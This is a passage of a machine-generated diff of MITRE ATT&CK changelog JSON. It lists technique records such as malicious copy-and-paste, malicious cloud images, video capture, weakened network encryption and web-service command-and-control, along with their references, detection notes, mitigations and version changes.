"Gabriel Currie", + "Harikrishnan Muthu, Cyble", + "Menachem Goldstein", + "ReliaQuest", + "SeungYoul Yoo, Ahn Lab" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "Process: Process Creation", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_remote_support": false, + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-30 17:53:48.667000+00:00\", \"old_value\": \"2025-04-15 19:59:15.487000+00:00\"}, \"root['description']\": {\"new_value\": \"An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \\n\\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\\n\\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\\n\\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. \", \"old_value\": \"An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \\n\\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)\\n\\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024) \\n\\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. \", \"diff\": \"--- \\n+++ \\n@@ -1,7 +1,7 @@\\n An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). \\n \\n-Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)\\n+Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\\n \\n-Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024) \\n+Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\\n \\n Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. \"}, \"root['x_mitre_contributors'][6]\": {\"new_value\": \"SeungYoul Yoo, Ahn Lab\", \"old_value\": \"seungyoul.yoo@ahnlab.com\"}}, \"iterable_item_added\": {\"root['external_references'][1]\": {\"source_name\": \"AhnLab Malicioys Copy Paste 2024\", \"description\": \"AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.\", \"url\": \"https://asec.ahnlab.com/en/73952/\"}, \"root['external_references'][2]\": {\"source_name\": \"AhnLab LummaC2 2025\", \"description\": \"AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.\", \"url\": \"https://asec.ahnlab.com/en/85699/\"}}}", + "previous_version": "1.0", + "description_change_table": "\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n

Old Description
New Description
t1An adversary may rely upon a user copying and pasting code it1An adversary may rely upon a user copying and pasting code i
>n order to gain execution. Users may be subjected to social >n order to gain execution. Users may be subjected to social 
>engineering to get them to copy and paste code directly into>engineering to get them to copy and paste code directly into
> a [Command and Scripting Interpreter](https://attack.mitre.> a [Command and Scripting Interpreter](https://attack.mitre.
>org/techniques/T1059).    Malicious websites, such as those >org/techniques/T1059).    Malicious websites, such as those 
>used in [Drive-by Compromise](https://attack.mitre.org/techn>used in [Drive-by Compromise](https://attack.mitre.org/techn
>iques/T1189), may present fake error messages or CAPTCHA pro>iques/T1189), may present fake error messages or CAPTCHA pro
>mpts that instruct users to open a terminal or the Windows R>mpts that instruct users to open a terminal or the Windows R
>un Dialog box and execute an arbitrary command. These comman>un Dialog box and execute an arbitrary command. These comman
>ds may be obfuscated using encoding or other techniques to c>ds may be obfuscated using encoding or other techniques to c
>onceal malicious intent. Once executed, the adversary will t>onceal malicious intent. Once executed, the adversary will t
>ypically be able to establish a foothold on the victim's mac>ypically be able to establish a foothold on the victim's mac
>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi
>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)  Advers>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citatio
>aries may also leverage phishing emails for this purpose. Wh>n: AhnLab LummaC2 2025)  Adversaries may also leverage phish
>en a user attempts to open an attachment, they may be presen>ing emails for this purpose. When a user attempts to open an
>ted with a fake error and offered a malicious command to pas> attachment, they may be presented with a fake error and off
>te as a solution.(Citation: Proofpoint ClickFix 2024)   Tric>ered a malicious command to paste as a solution.(Citation: P
>king a user into executing a command themselves may help to >roofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Pas
>bypass email filtering, browser sandboxing, or other mitigat>te 2024)  Tricking a user into executing a command themselve
>ions designed to protect users against malicious downloaded >s may help to bypass email filtering, browser sandboxing, or
>files. > other mitigations designed to protect users against malicio
 >us downloaded files. 
", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention", + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-30 17:20:05.789000+00:00", + "modified": "2025-04-25 14:47:40.745000+00:00", + "name": "Malicious Image", + "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/003", + "external_id": "T1204.003" + }, + { + "source_name": "Summit Route Malicious AMIs", + "description": "Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.", + "url": "https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/" + }, + { + "source_name": "Aqua Security Cloud Native Threat Report June 2021", + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", + "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Vishwas Manral, McAfee" + ], + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Command: Command Execution", + "Image: Image Creation", + "Container: Container Start", + "Container: Container Creation", + "Instance: Instance Start", + "Instance: Instance Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Containers" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:40.745000+00:00\", \"old_value\": \"2025-04-15 19:58:58.109000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1031: Network Intrusion Prevention", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0007: Image (Image Creation)", + "DS0015: Application Log (Application Log Content)", + "DS0017: Command (Command Execution)", + "DS0030: Instance (Instance Creation)", + "DS0030: Instance (Instance Start)", + "DS0032: Container (Container Creation)", + "DS0032: Container (Container Start)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:37.917000+00:00", + "modified": "2025-04-25 15:15:42.332000+00:00", + "name": "Video Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1125", + "external_id": "T1125" + }, + { + "source_name": "objective-see 2017 review", + "description": "Patrick Wardle. (n.d.). Retrieved March 20, 2018.", + "url": "https://objective-see.com/blog/blog_0x25.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:42.332000+00:00\", \"old_value\": \"2025-04-16 20:37:17.864000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 18:47:08.759000+00:00", + "modified": "2025-04-25 15:15:15.040000+00:00", + "name": "Weaken Encryption", + "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600", + "external_id": "T1600" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:15.040000+00:00\", \"old_value\": \"2025-04-15 19:58:12.571000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:11:18.757000+00:00", + "modified": "2025-04-25 14:47:14.891000+00:00", + "name": "Disable Crypto Hardware", + "description": "Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600/002", + "external_id": "T1600.002" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:14.891000+00:00\", \"old_value\": \"2025-04-15 19:58:45.787000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:03:48.310000+00:00", + "modified": "2025-04-25 14:46:24.048000+00:00", + "name": "Reduce Key Space", + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600/001", + "external_id": "T1600.001" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network Devices" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:24.048000+00:00\", \"old_value\": \"2025-04-15 19:58:23.689000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 22:34:03.024000+00:00", + "modified": "2025-04-25 14:47:51.598000+00:00", + "name": "Bidirectional Communication", + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/002", + "external_id": "T1102.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:51.598000+00:00\", \"old_value\": \"2025-04-15 19:59:03.009000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 22:24:21.841000+00:00", + "modified": "2025-04-25 14:48:36.031000+00:00", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1102/001", + "external_id": "T1102.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:36.031000+00:00\", \"old_value\": \"2025-04-15 19:59:22.651000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1021: Restrict Web-Based Content", + "M1031: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-14 22:45:52.963000+00:00", + "modified": 